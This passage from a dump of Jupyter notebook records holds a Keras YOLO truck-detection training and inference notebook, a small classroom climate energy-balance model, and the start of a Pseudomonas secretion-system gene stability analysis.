\n____________________________________________________________________________________________________\nnorm_6 (BatchNormalization) (None, 52, 52, 256) 1024 conv_6[0][0] \n____________________________________________________________________________________________________\nleaky_re_lu_6 (LeakyReLU) (None, 52, 52, 256) 0 norm_6[0][0] \n____________________________________________________________________________________________________\nconv_7 (Conv2D) (None, 52, 52, 128) 32768 leaky_re_lu_6[0][0] \n____________________________________________________________________________________________________\nnorm_7 (BatchNormalization) (None, 52, 52, 128) 512 conv_7[0][0] \n____________________________________________________________________________________________________\nleaky_re_lu_7 (LeakyReLU) (None, 52, 52, 128) 0 norm_7[0][0] \n____________________________________________________________________________________________________\nconv_8 (Conv2D) (None, 52, 52, 256) 294912 leaky_re_lu_7[0][0] \n____________________________________________________________________________________________________\nnorm_8 (BatchNormalization) (None, 52, 52, 256) 1024 conv_8[0][0] \n____________________________________________________________________________________________________\nleaky_re_lu_8 (LeakyReLU) (None, 52, 52, 256) 0 norm_8[0][0] \n____________________________________________________________________________________________________\nmax_pooling2d_4 (MaxPooling2D) (None, 26, 26, 256) 0 leaky_re_lu_8[0][0] \n____________________________________________________________________________________________________\nconv_9 (Conv2D) (None, 26, 26, 512) 1179648 max_pooling2d_4[0][0] \n____________________________________________________________________________________________________\nnorm_9 (BatchNormalization) (None, 26, 26, 512) 2048 conv_9[0][0] \n____________________________________________________________________________________________________\nleaky_re_lu_9 (LeakyReLU) (None, 26, 26, 512) 0 norm_9[0][0] \n____________________________________________________________________________________________________\nconv_10 (Conv2D) (None, 26, 26, 256) 131072 leaky_re_lu_9[0][0] \n____________________________________________________________________________________________________\nnorm_10 (BatchNormalization) (None, 26, 26, 256) 1024 conv_10[0][0] \n____________________________________________________________________________________________________\nleaky_re_lu_10 (LeakyReLU) (None, 26, 26, 256) 0 norm_10[0][0] \n____________________________________________________________________________________________________\nconv_11 (Conv2D) (None, 26, 26, 512) 1179648 leaky_re_lu_10[0][0] \n____________________________________________________________________________________________________\nnorm_11 (BatchNormalization) (None, 26, 26, 512) 2048 conv_11[0][0] \n____________________________________________________________________________________________________\nleaky_re_lu_11 (LeakyReLU) (None, 26, 26, 512) 0 norm_11[0][0] \n____________________________________________________________________________________________________\nconv_12 (Conv2D) (None, 26, 26, 256) 131072 leaky_re_lu_11[0][0] \n____________________________________________________________________________________________________\nnorm_12 (BatchNormalization) (None, 26, 26, 256) 1024 conv_12[0][0] \n____________________________________________________________________________________________________\nleaky_re_lu_12 (LeakyReLU) (None, 26, 26, 256) 0 norm_12[0][0] 
\n____________________________________________________________________________________________________\nconv_13 (Conv2D) (None, 26, 26, 512) 1179648 leaky_re_lu_12[0][0] \n____________________________________________________________________________________________________\nnorm_13 (BatchNormalization) (None, 26, 26, 512) 2048 conv_13[0][0] \n____________________________________________________________________________________________________\nleaky_re_lu_13 (LeakyReLU) (None, 26, 26, 512) 0 norm_13[0][0] \n____________________________________________________________________________________________________\nmax_pooling2d_5 (MaxPooling2D) (None, 13, 13, 512) 0 leaky_re_lu_13[0][0] \n____________________________________________________________________________________________________\nconv_14 (Conv2D) (None, 13, 13, 1024) 4718592 max_pooling2d_5[0][0] \n____________________________________________________________________________________________________\nnorm_14 (BatchNormalization) (None, 13, 13, 1024) 4096 conv_14[0][0] \n____________________________________________________________________________________________________\nleaky_re_lu_14 (LeakyReLU) (None, 13, 13, 1024) 0 norm_14[0][0] \n____________________________________________________________________________________________________\nconv_15 (Conv2D) (None, 13, 13, 512) 524288 leaky_re_lu_14[0][0] \n____________________________________________________________________________________________________\nnorm_15 (BatchNormalization) (None, 13, 13, 512) 2048 conv_15[0][0] \n____________________________________________________________________________________________________\nleaky_re_lu_15 (LeakyReLU) (None, 13, 13, 512) 0 norm_15[0][0] \n____________________________________________________________________________________________________\nconv_16 (Conv2D) (None, 13, 13, 1024) 4718592 leaky_re_lu_15[0][0] \n____________________________________________________________________________________________________\nnorm_16 (BatchNormalization) (None, 13, 13, 1024) 4096 conv_16[0][0] \n____________________________________________________________________________________________________\nleaky_re_lu_16 (LeakyReLU) (None, 13, 13, 1024) 0 norm_16[0][0] \n____________________________________________________________________________________________________\nconv_17 (Conv2D) (None, 13, 13, 512) 524288 leaky_re_lu_16[0][0] \n____________________________________________________________________________________________________\nnorm_17 (BatchNormalization) (None, 13, 13, 512) 2048 conv_17[0][0] \n____________________________________________________________________________________________________\nleaky_re_lu_17 (LeakyReLU) (None, 13, 13, 512) 0 norm_17[0][0] \n____________________________________________________________________________________________________\nconv_18 (Conv2D) (None, 13, 13, 1024) 4718592 leaky_re_lu_17[0][0] \n____________________________________________________________________________________________________\nnorm_18 (BatchNormalization) (None, 13, 13, 1024) 4096 conv_18[0][0] \n____________________________________________________________________________________________________\nleaky_re_lu_18 (LeakyReLU) (None, 13, 13, 1024) 0 norm_18[0][0] \n____________________________________________________________________________________________________\nconv_19 (Conv2D) (None, 13, 13, 1024) 9437184 leaky_re_lu_18[0][0] \n____________________________________________________________________________________________________\nnorm_19 (BatchNormalization) (None, 13, 
13, 1024) 4096 conv_19[0][0] \n____________________________________________________________________________________________________\nconv_21 (Conv2D) (None, 26, 26, 64) 32768 leaky_re_lu_13[0][0] \n____________________________________________________________________________________________________\nleaky_re_lu_19 (LeakyReLU) (None, 13, 13, 1024) 0 norm_19[0][0] \n____________________________________________________________________________________________________\nnorm_21 (BatchNormalization) (None, 26, 26, 64) 256 conv_21[0][0] \n____________________________________________________________________________________________________\nconv_20 (Conv2D) (None, 13, 13, 1024) 9437184 leaky_re_lu_19[0][0] \n____________________________________________________________________________________________________\nleaky_re_lu_21 (LeakyReLU) (None, 26, 26, 64) 0 norm_21[0][0] \n____________________________________________________________________________________________________\nnorm_20 (BatchNormalization) (None, 13, 13, 1024) 4096 conv_20[0][0] \n____________________________________________________________________________________________________\nlambda_1 (Lambda) (None, 13, 13, 256) 0 leaky_re_lu_21[0][0] \n____________________________________________________________________________________________________\nleaky_re_lu_20 (LeakyReLU) (None, 13, 13, 1024) 0 norm_20[0][0] \n____________________________________________________________________________________________________\nconcatenate_1 (Concatenate) (None, 13, 13, 1280) 0 lambda_1[0][0] \n leaky_re_lu_20[0][0] \n____________________________________________________________________________________________________\nconv_22 (Conv2D) (None, 13, 13, 1024) 11796480 concatenate_1[0][0] \n____________________________________________________________________________________________________\nnorm_22 (BatchNormalization) (None, 13, 13, 1024) 4096 conv_22[0][0] \n____________________________________________________________________________________________________\nleaky_re_lu_22 (LeakyReLU) (None, 13, 13, 1024) 0 norm_22[0][0] \n____________________________________________________________________________________________________\nconv_23 (Conv2D) (None, 13, 13, 30) 30750 leaky_re_lu_22[0][0] \n____________________________________________________________________________________________________\nreshape_1 (Reshape) (None, 13, 13, 5, 6) 0 conv_23[0][0] \n____________________________________________________________________________________________________\ninput_2 (InputLayer) (None, 1, 1, 1, 50, 4 0 \n____________________________________________________________________________________________________\nlambda_2 (Lambda) (None, 13, 13, 5, 6) 0 reshape_1[0][0] \n input_2[0][0] \n====================================================================================================\nTotal params: 50,578,686\nTrainable params: 50,558,014\nNon-trainable params: 20,672\n____________________________________________________________________________________________________\n"
]
],
[
[
"# Load pretrained weights",
"_____no_output_____"
],
[
"**Load the weights originally provided by YOLO**",
"_____no_output_____"
]
],
[
[
"weight_reader = WeightReader(wt_path)",
"_____no_output_____"
],
[
"weight_reader.reset()\nnb_conv = 23\n\nfor i in range(1, nb_conv+1):\n conv_layer = model.get_layer('conv_' + str(i))\n \n if i < nb_conv:\n norm_layer = model.get_layer('norm_' + str(i))\n \n size = np.prod(norm_layer.get_weights()[0].shape)\n\n beta = weight_reader.read_bytes(size)\n gamma = weight_reader.read_bytes(size)\n mean = weight_reader.read_bytes(size)\n var = weight_reader.read_bytes(size)\n\n weights = norm_layer.set_weights([gamma, beta, mean, var]) \n \n if len(conv_layer.get_weights()) > 1:\n bias = weight_reader.read_bytes(np.prod(conv_layer.get_weights()[1].shape))\n kernel = weight_reader.read_bytes(np.prod(conv_layer.get_weights()[0].shape))\n kernel = kernel.reshape(list(reversed(conv_layer.get_weights()[0].shape)))\n kernel = kernel.transpose([2,3,1,0])\n conv_layer.set_weights([kernel, bias])\n else:\n kernel = weight_reader.read_bytes(np.prod(conv_layer.get_weights()[0].shape))\n kernel = kernel.reshape(list(reversed(conv_layer.get_weights()[0].shape)))\n kernel = kernel.transpose([2,3,1,0])\n conv_layer.set_weights([kernel])",
"_____no_output_____"
]
],
[
[
"**Randomize weights of the last layer**",
"_____no_output_____"
]
],
[
[
"layer = model.layers[-4] # the last convolutional layer\nweights = layer.get_weights()\n\nnew_kernel = np.random.normal(size=weights[0].shape)/(GRID_H*GRID_W)\nnew_bias = np.random.normal(size=weights[1].shape)/(GRID_H*GRID_W)\n\nlayer.set_weights([new_kernel, new_bias])",
"_____no_output_____"
]
],
[
[
"# Perform training",
"_____no_output_____"
],
[
"**Loss function**",
"_____no_output_____"
],
[
"$$\\begin{multline}\n\\lambda_\\textbf{coord}\n\\sum_{i = 0}^{S^2}\n \\sum_{j = 0}^{B}\n L_{ij}^{\\text{obj}}\n \\left[\n \\left(\n x_i - \\hat{x}_i\n \\right)^2 +\n \\left(\n y_i - \\hat{y}_i\n \\right)^2\n \\right]\n\\\\\n+ \\lambda_\\textbf{coord} \n\\sum_{i = 0}^{S^2}\n \\sum_{j = 0}^{B}\n L_{ij}^{\\text{obj}}\n \\left[\n \\left(\n \\sqrt{w_i} - \\sqrt{\\hat{w}_i}\n \\right)^2 +\n \\left(\n \\sqrt{h_i} - \\sqrt{\\hat{h}_i}\n \\right)^2\n \\right]\n\\\\\n+ \\sum_{i = 0}^{S^2}\n \\sum_{j = 0}^{B}\n L_{ij}^{\\text{obj}}\n \\left(\n C_i - \\hat{C}_i\n \\right)^2\n\\\\\n+ \\lambda_\\textrm{noobj}\n\\sum_{i = 0}^{S^2}\n \\sum_{j = 0}^{B}\n L_{ij}^{\\text{noobj}}\n \\left(\n C_i - \\hat{C}_i\n \\right)^2\n\\\\\n+ \\sum_{i = 0}^{S^2}\nL_i^{\\text{obj}}\n \\sum_{c \\in \\textrm{classes}}\n \\left(\n p_i(c) - \\hat{p}_i(c)\n \\right)^2\n\\end{multline}$$",
"_____no_output_____"
]
],
[
[
"def custom_loss(y_true, y_pred):\n mask_shape = tf.shape(y_true)[:4]\n \n cell_x = tf.to_float(tf.reshape(tf.tile(tf.range(GRID_W), [GRID_H]), (1, GRID_H, GRID_W, 1, 1)))\n cell_y = tf.transpose(cell_x, (0,2,1,3,4))\n\n cell_grid = tf.tile(tf.concat([cell_x,cell_y], -1), [BATCH_SIZE, 1, 1, 5, 1])\n \n coord_mask = tf.zeros(mask_shape)\n conf_mask = tf.zeros(mask_shape)\n class_mask = tf.zeros(mask_shape)\n \n seen = tf.Variable(0.)\n total_recall = tf.Variable(0.)\n \n \"\"\"\n Adjust prediction\n \"\"\"\n ### adjust x and y \n pred_box_xy = tf.sigmoid(y_pred[..., :2]) + cell_grid\n \n ### adjust w and h\n pred_box_wh = tf.exp(y_pred[..., 2:4]) * np.reshape(ANCHORS, [1,1,1,BOX,2])\n \n ### adjust confidence\n pred_box_conf = tf.sigmoid(y_pred[..., 4])\n \n ### adjust class probabilities\n pred_box_class = y_pred[..., 5:]\n \n \"\"\"\n Adjust ground truth\n \"\"\"\n ### adjust x and y\n true_box_xy = y_true[..., 0:2] # relative position to the containing cell\n \n ### adjust w and h\n true_box_wh = y_true[..., 2:4] # number of cells accross, horizontally and vertically\n \n ### adjust confidence\n true_wh_half = true_box_wh / 2.\n true_mins = true_box_xy - true_wh_half\n true_maxes = true_box_xy + true_wh_half\n \n pred_wh_half = pred_box_wh / 2.\n pred_mins = pred_box_xy - pred_wh_half\n pred_maxes = pred_box_xy + pred_wh_half \n \n intersect_mins = tf.maximum(pred_mins, true_mins)\n intersect_maxes = tf.minimum(pred_maxes, true_maxes)\n intersect_wh = tf.maximum(intersect_maxes - intersect_mins, 0.)\n intersect_areas = intersect_wh[..., 0] * intersect_wh[..., 1]\n \n true_areas = true_box_wh[..., 0] * true_box_wh[..., 1]\n pred_areas = pred_box_wh[..., 0] * pred_box_wh[..., 1]\n\n union_areas = pred_areas + true_areas - intersect_areas\n iou_scores = tf.truediv(intersect_areas, union_areas)\n \n true_box_conf = iou_scores * y_true[..., 4]\n \n ### adjust class probabilities\n true_box_class = tf.argmax(y_true[..., 5:], -1)\n \n \"\"\"\n Determine the masks\n \"\"\"\n ### coordinate mask: simply the position of the ground truth boxes (the predictors)\n coord_mask = tf.expand_dims(y_true[..., 4], axis=-1) * COORD_SCALE\n \n ### confidence mask: penelize predictors + penalize boxes with low IOU\n # penalize the confidence of the boxes, which have IOU with some ground truth box < 0.6\n true_xy = true_boxes[..., 0:2]\n true_wh = true_boxes[..., 2:4]\n \n true_wh_half = true_wh / 2.\n true_mins = true_xy - true_wh_half\n true_maxes = true_xy + true_wh_half\n \n pred_xy = tf.expand_dims(pred_box_xy, 4)\n pred_wh = tf.expand_dims(pred_box_wh, 4)\n \n pred_wh_half = pred_wh / 2.\n pred_mins = pred_xy - pred_wh_half\n pred_maxes = pred_xy + pred_wh_half \n \n intersect_mins = tf.maximum(pred_mins, true_mins)\n intersect_maxes = tf.minimum(pred_maxes, true_maxes)\n intersect_wh = tf.maximum(intersect_maxes - intersect_mins, 0.)\n intersect_areas = intersect_wh[..., 0] * intersect_wh[..., 1]\n \n true_areas = true_wh[..., 0] * true_wh[..., 1]\n pred_areas = pred_wh[..., 0] * pred_wh[..., 1]\n\n union_areas = pred_areas + true_areas - intersect_areas\n iou_scores = tf.truediv(intersect_areas, union_areas)\n\n best_ious = tf.reduce_max(iou_scores, axis=4)\n conf_mask = conf_mask + tf.to_float(best_ious < 0.6) * (1 - y_true[..., 4]) * NO_OBJECT_SCALE\n \n # penalize the confidence of the boxes, which are reponsible for corresponding ground truth box\n conf_mask = conf_mask + y_true[..., 4] * OBJECT_SCALE\n \n ### class mask: simply the position of the ground truth boxes (the predictors)\n class_mask = 
y_true[..., 4] * tf.gather(CLASS_WEIGHTS, true_box_class) * CLASS_SCALE \n \n \"\"\"\n Warm-up training\n \"\"\"\n no_boxes_mask = tf.to_float(coord_mask < COORD_SCALE/2.)\n seen = tf.assign_add(seen, 1.)\n \n true_box_xy, true_box_wh, coord_mask = tf.cond(tf.less(seen, WARM_UP_BATCHES), \n lambda: [true_box_xy + (0.5 + cell_grid) * no_boxes_mask, \n true_box_wh + tf.ones_like(true_box_wh) * np.reshape(ANCHORS, [1,1,1,BOX,2]) * no_boxes_mask, \n tf.ones_like(coord_mask)],\n lambda: [true_box_xy, \n true_box_wh,\n coord_mask])\n \n \"\"\"\n Finalize the loss\n \"\"\"\n nb_coord_box = tf.reduce_sum(tf.to_float(coord_mask > 0.0))\n nb_conf_box = tf.reduce_sum(tf.to_float(conf_mask > 0.0))\n nb_class_box = tf.reduce_sum(tf.to_float(class_mask > 0.0))\n \n loss_xy = tf.reduce_sum(tf.square(true_box_xy-pred_box_xy) * coord_mask) / (nb_coord_box + 1e-6) / 2.\n loss_wh = tf.reduce_sum(tf.square(true_box_wh-pred_box_wh) * coord_mask) / (nb_coord_box + 1e-6) / 2.\n loss_conf = tf.reduce_sum(tf.square(true_box_conf-pred_box_conf) * conf_mask) / (nb_conf_box + 1e-6) / 2.\n loss_class = tf.nn.sparse_softmax_cross_entropy_with_logits(labels=true_box_class, logits=pred_box_class)\n loss_class = tf.reduce_sum(loss_class * class_mask) / (nb_class_box + 1e-6)\n \n loss = loss_xy + loss_wh + loss_conf + loss_class\n \n nb_true_box = tf.reduce_sum(y_true[..., 4])\n nb_pred_box = tf.reduce_sum(tf.to_float(true_box_conf > 0.5) * tf.to_float(pred_box_conf > 0.3))\n\n \"\"\"\n Debugging code\n \"\"\" \n current_recall = nb_pred_box/(nb_true_box + 1e-6)\n total_recall = tf.assign_add(total_recall, current_recall) \n\n loss = tf.Print(loss, [tf.zeros((1))], message='Dummy Line \\t', summarize=1000)\n loss = tf.Print(loss, [loss_xy], message='Loss XY \\t', summarize=1000)\n loss = tf.Print(loss, [loss_wh], message='Loss WH \\t', summarize=1000)\n loss = tf.Print(loss, [loss_conf], message='Loss Conf \\t', summarize=1000)\n loss = tf.Print(loss, [loss_class], message='Loss Class \\t', summarize=1000)\n loss = tf.Print(loss, [loss], message='Total Loss \\t', summarize=1000)\n loss = tf.Print(loss, [current_recall], message='Current Recall \\t', summarize=1000)\n loss = tf.Print(loss, [total_recall/seen], message='Average Recall \\t', summarize=1000)\n \n return loss",
"_____no_output_____"
]
],
[
[
"**Parse the annotations to construct train generator and validation generator**",
"_____no_output_____"
]
],
[
[
"generator_config = {\n 'IMAGE_H' : IMAGE_H, \n 'IMAGE_W' : IMAGE_W,\n 'GRID_H' : GRID_H, \n 'GRID_W' : GRID_W,\n 'BOX' : BOX,\n 'LABELS' : LABELS,\n 'CLASS' : len(LABELS),\n 'ANCHORS' : ANCHORS,\n 'BATCH_SIZE' : BATCH_SIZE,\n 'TRUE_BOX_BUFFER' : 50,\n}",
"_____no_output_____"
],
[
"def normalize(image):\n return image / 255.",
"_____no_output_____"
],
[
"train_imgs, seen_train_labels = parse_annotation(train_annot_folder, train_image_folder, labels=LABELS)\n### write parsed annotations to pickle for fast retrieval next time\n#with open('train_imgs', 'wb') as fp:\n# pickle.dump(train_imgs, fp)\n\n### read saved pickle of parsed annotations\n#with open ('train_imgs', 'rb') as fp:\n# train_imgs = pickle.load(fp)\ntrain_batch = BatchGenerator(train_imgs, generator_config, norm=normalize)\n\nvalid_imgs, seen_valid_labels = parse_annotation(valid_annot_folder, valid_image_folder, labels=LABELS)\n### write parsed annotations to pickle for fast retrieval next time\n#with open('valid_imgs', 'wb') as fp:\n# pickle.dump(valid_imgs, fp)\n\n### read saved pickle of parsed annotations\n#with open ('valid_imgs', 'rb') as fp:\n# valid_imgs = pickle.load(fp)\nvalid_batch = BatchGenerator(valid_imgs, generator_config, norm=normalize, jitter=False)",
"_____no_output_____"
]
],
[
[
"**Setup a few callbacks and start the training**",
"_____no_output_____"
]
],
[
[
"early_stop = EarlyStopping(monitor='val_loss', \n min_delta=0.001, \n patience=10, \n mode='min', \n verbose=1)\n\ncheckpoint = ModelCheckpoint('weights_truck2.h5', \n monitor='val_loss', \n verbose=1, \n save_best_only=True, \n mode='min', \n period=1)",
"_____no_output_____"
],
[
"tb_counter = len([log for log in os.listdir(os.path.expanduser('~/logs/')) if 'truck_' in log]) + 1\ntensorboard = TensorBoard(log_dir=os.path.expanduser('~/logs/') + 'truck_' + '_' + str(tb_counter), \n histogram_freq=0, \n write_graph=True, \n write_images=False)\n\noptimizer = Adam(lr=0.1e-3, beta_1=0.9, beta_2=0.999, epsilon=1e-08, decay=0.0)\n#optimizer = SGD(lr=1e-4, decay=0.0005, momentum=0.9)\n#optimizer = RMSprop(lr=1e-4, rho=0.9, epsilon=1e-08, decay=0.0)\n\nmodel.load_weights(\"wednesday2.h5\")\n\nmodel.compile(loss=custom_loss, optimizer=optimizer)\n\n\n\n#history = model.fit_generator(generator = train_batch, \n steps_per_epoch = len(train_batch), \n epochs = 100, \n verbose = 1,\n validation_data = valid_batch,\n validation_steps = len(valid_batch),\n callbacks = [early_stop, checkpoint, tensorboard], \n max_queue_size = 3)\n\n#print(history.history.keys())\n# summarize history for accuracy\n#plt.plot(history.history['loss'])\n#plt.plot(history.history['val_loss'])\n#plt.title('model loss')\n#plt.ylabel('loss')\n#plt.xlabel('epoch')\n#plt.legend(['train', 'test'], loc='upper left')\n#plt.show()",
"Epoch 1/100\n12/13 [==========================>...] - ETA: 4s - loss: 0.5833Epoch 00000: val_loss improved from inf to 0.47258, saving model to weights_truck2.h5\n13/13 [==============================] - 70s - loss: 0.5712 - val_loss: 0.4726\nEpoch 2/100\n12/13 [==========================>...] - ETA: 3s - loss: 0.5854Epoch 00001: val_loss improved from 0.47258 to 0.44968, saving model to weights_truck2.h5\n13/13 [==============================] - 68s - loss: 0.5872 - val_loss: 0.4497\nEpoch 3/100\n12/13 [==========================>...] - ETA: 3s - loss: 0.5750Epoch 00002: val_loss improved from 0.44968 to 0.43230, saving model to weights_truck2.h5\n13/13 [==============================] - 61s - loss: 0.5659 - val_loss: 0.4323\nEpoch 4/100\n12/13 [==========================>...] - ETA: 3s - loss: 0.5410Epoch 00003: val_loss did not improve\n13/13 [==============================] - 52s - loss: 0.5439 - val_loss: 0.4491\nEpoch 5/100\n12/13 [==========================>...] - ETA: 3s - loss: 0.5806Epoch 00004: val_loss did not improve\n13/13 [==============================] - 48s - loss: 0.5815 - val_loss: 0.4697\nEpoch 6/100\n12/13 [==========================>...] - ETA: 3s - loss: 0.6094Epoch 00005: val_loss did not improve\n13/13 [==============================] - 51s - loss: 0.6043 - val_loss: 0.4687\nEpoch 7/100\n12/13 [==========================>...] - ETA: 3s - loss: 0.5725Epoch 00006: val_loss did not improve\n13/13 [==============================] - 52s - loss: 0.5736 - val_loss: 0.4330\nEpoch 8/100\n12/13 [==========================>...] - ETA: 3s - loss: 0.5668Epoch 00007: val_loss did not improve\n13/13 [==============================] - 50s - loss: 0.5612 - val_loss: 0.4426\nEpoch 9/100\n12/13 [==========================>...] - ETA: 3s - loss: 0.5820Epoch 00008: val_loss did not improve\n13/13 [==============================] - 49s - loss: 0.5785 - val_loss: 0.4446\nEpoch 10/100\n11/13 [========================>.....] - ETA: 6s - loss: 0.5646"
]
],
[
[
"# Perform detection on image",
"_____no_output_____"
]
],
[
[
"model.load_weights(\"best_weights.h5\")",
"_____no_output_____"
],
[
"image = cv2.imread('train_image_folder/00001018.jpg')\ndummy_array = np.zeros((1,1,1,1,TRUE_BOX_BUFFER,4))\n\nplt.figure(figsize=(10,10))\n\ninput_image = cv2.resize(image, (416, 416))\ninput_image = input_image / 255.\ninput_image = input_image[:,:,::-1]\ninput_image = np.expand_dims(input_image, 0)\n\nnetout = model.predict([input_image, dummy_array])\n\nboxes = decode_netout(netout[0], \n obj_threshold=0.3,\n nms_threshold=NMS_THRESHOLD,\n anchors=ANCHORS, \n nb_class=CLASS)\n \nimage = draw_boxes(image, boxes, labels=LABELS)\n\nplt.imshow(image[:,:,::-1]); plt.show()",
"_____no_output_____"
]
],
[
[
"# Perform detection on video",
"_____no_output_____"
]
],
[
[
"model.load_weights(\"weights_coco.h5\")\n\ndummy_array = np.zeros((1,1,1,1,TRUE_BOX_BUFFER,4))",
"_____no_output_____"
],
[
"video_inp = '../basic-yolo-keras/images/phnom_penh.mp4'\nvideo_out = '../basic-yolo-keras/images/phnom_penh_bbox.mp4'\n\nvideo_reader = cv2.VideoCapture(video_inp)\n\nnb_frames = int(video_reader.get(cv2.CAP_PROP_FRAME_COUNT))\nframe_h = int(video_reader.get(cv2.CAP_PROP_FRAME_HEIGHT))\nframe_w = int(video_reader.get(cv2.CAP_PROP_FRAME_WIDTH))\n\nvideo_writer = cv2.VideoWriter(video_out,\n cv2.VideoWriter_fourcc(*'XVID'), \n 50.0, \n (frame_w, frame_h))\n\nfor i in tqdm(range(nb_frames)):\n ret, image = video_reader.read()\n \n input_image = cv2.resize(image, (416, 416))\n input_image = input_image / 255.\n input_image = input_image[:,:,::-1]\n input_image = np.expand_dims(input_image, 0)\n\n netout = model.predict([input_image, dummy_array])\n\n boxes = decode_netout(netout[0], \n obj_threshold=0.3,\n nms_threshold=NMS_THRESHOLD,\n anchors=ANCHORS, \n nb_class=CLASS)\n image = draw_boxes(image, boxes, labels=LABELS)\n\n video_writer.write(np.uint8(image))\n \nvideo_reader.release()\nvideo_writer.release() ",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
]
] |
cb2ae033e0fd914beef618417b2d44fc80fbc1f7 | 38,985 | ipynb | Jupyter Notebook | InNZ/ClassDoesIt.ipynb | mglerner/NZClimateCourse | df8243029df5ae53cfc970a441acf10b8fc415f1 | [
"MIT"
] | null | null | null | InNZ/ClassDoesIt.ipynb | mglerner/NZClimateCourse | df8243029df5ae53cfc970a441acf10b8fc415f1 | [
"MIT"
] | null | null | null | InNZ/ClassDoesIt.ipynb | mglerner/NZClimateCourse | df8243029df5ae53cfc970a441acf10b8fc415f1 | [
"MIT"
] | 1 | 2020-09-18T03:50:20.000Z | 2020-09-18T03:50:20.000Z | 121.071429 | 12,452 | 0.880133 | [
[
[
"timestep = 100.0 # years\nL = 1350.0 # W/m^2\nalbedo = 0.3\nepsilon = 1\nsigma = 5.67e-8 # W/m^2 K^4\nheat_capacity = 16736000000\n\ntime, T, heat_content, heat_in, heat_out, heat_flux = [], [], [], [], [], []",
"_____no_output_____"
],
[
"names = [\"Jacob\", \"Emma0.5\", \"Emma1.0\", \"Lilly\"]\nfor i in names:\n print(\"Some name is\",i)",
"Some name is Jacob\nSome name is Emma0.5\nSome name is Emma1.0\nSome name is Lilly\n"
],
[
"names[50]",
"_____no_output_____"
],
[
"for i in range(5):\n print(\"hi\")",
"hi\nhi\nhi\nhi\nhi\n"
],
[
"timestep = 100.0 # years\nwater_depth = 4000.0 # m\nL = 1350.0 # W/m^2\nalbedo = 0.3\nepsilon = 1\nsigma = 5.67e-8 # W/m^2 K^4\nheat_capacity = 16736000000\n\ntime = []\nT = []\nheat_content = []\nheat_in = []\nheat_out = []\nheat_flux = []\n\n# Set up our planet\ntime.append(0)\nT.append(0)\nheat_content.append(0)\nheat_in.append(L*(1-albedo)/4)\nheat_out.append(epsilon*sigma*T[-1]**4)\n\nheat_flux.append((heat_in[-1]-heat_out[-1])*60*60*24*365)\n\n\nnYears = 5000\nfor i in range(nYears):\n # Update heat content of planet based on how much heat\n # flowed in/out last year\n heat_content = heat_content + [heat_content[-1] + heat_flux[-1]]\n # Figure out how much heat flows in this year\n heat_in = heat_in + [L*(1-albedo)/4]\n # Figure out how much heat flows out this year\n heat_out= heat_out + [epsilon*sigma*T[-1]**4]\n heat_flux = heat_flux + [(heat_in[-1] - heat_out[-1])*60*60*24*365]\n T = T + [heat_content[-1]/heat_capacity]\n # Keep track of everything in lists\n last_year = time[-1]\n time.append(last_year + 1)\nplt.plot(T)",
"_____no_output_____"
],
[
"plt.plot(heat_flux)",
"_____no_output_____"
],
[
"from matplotlib import pyplot as plt",
"_____no_output_____"
],
[
"plt.plot(T)",
"_____no_output_____"
],
[
"time = time + [10,11,12]\ntime",
"_____no_output_____"
],
[
"time.append(15)",
"_____no_output_____"
],
[
"time",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb2ae4fb930071ab390bc6b807e5998a95b70655 | 149,894 | ipynb | Jupyter Notebook | 3_core_core_analysis/6_explore_secretion_genes.ipynb | greenelab/core-accessory-interactome | 98e3f9a3036373fc5734181832f11852a75aa914 | [
"BSD-3-Clause"
] | null | null | null | 3_core_core_analysis/6_explore_secretion_genes.ipynb | greenelab/core-accessory-interactome | 98e3f9a3036373fc5734181832f11852a75aa914 | [
"BSD-3-Clause"
] | 33 | 2020-04-24T23:07:49.000Z | 2022-03-10T22:53:09.000Z | 3_core_core_analysis/6_explore_secretion_genes.ipynb | greenelab/core-accessory-interactome | 98e3f9a3036373fc5734181832f11852a75aa914 | [
"BSD-3-Clause"
] | 1 | 2020-04-01T17:09:27.000Z | 2020-04-01T17:09:27.000Z | 60.441129 | 45,368 | 0.564606 | [
[
[
"# Explore secretion system genes\n\n[KEGG enrichment analysis](5_KEGG_enrichment_of_stable_genes.ipynb) found that genes associated with ribosome, Lipopolysaccharide (outer membrane) biosynthesis, citrate cycle are significantly conserved across strains.\nIndeed functions that are essential seem to be significantly conserved across strains as expected.\nHowever, there are also pathways like the secretion systems, which allow for inter-strain warfare, that we’d expect to vary across strains but were found to be conserved (T3SS significant but not T6SS).\n\nThis notebook examines the stability score of the genes in the secretion systems to determine if there is a subset of the secretion genes, related to the machinery that is conserved while others, like the secretory proteins, are more variable.",
"_____no_output_____"
]
],
[
[
"%load_ext autoreload\n%autoreload 2\n%matplotlib inline\nimport os\nimport random\nimport pandas as pd\nimport numpy as np\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom scripts import annotations\n\nrandom.seed(1)",
"/home/alexandra/anaconda3/envs/core_acc/lib/python3.7/site-packages/matplotlib/__init__.py:886: MatplotlibDeprecationWarning: \nexamples.directory is deprecated; in the future, examples will be found relative to the 'datapath' directory.\n \"found relative to the 'datapath' directory.\".format(key))\n"
]
],
[
[
"## Load data and metadata",
"_____no_output_____"
]
],
[
[
"# Input similarity scores and annotations filenames\n# Since the results are similar we only need to look at the scores for one strain type\npao1_similarity_filename = \"pao1_core_similarity_associations_final_spell.tsv\"",
"_____no_output_____"
],
[
"# Import df\npao1_similarity = pd.read_csv(pao1_similarity_filename, sep=\"\\t\", index_col=0, header=0)",
"_____no_output_____"
],
[
"pao1_similarity.head()",
"_____no_output_____"
],
[
"# Load KEGG pathway data\npao1_pathway_filename = \"https://raw.githubusercontent.com/greenelab/adage/7a4eda39d360b224268921dc1f2c14b32788ab16/Node_interpretation/pseudomonas_KEGG_terms.txt\"",
"_____no_output_____"
],
[
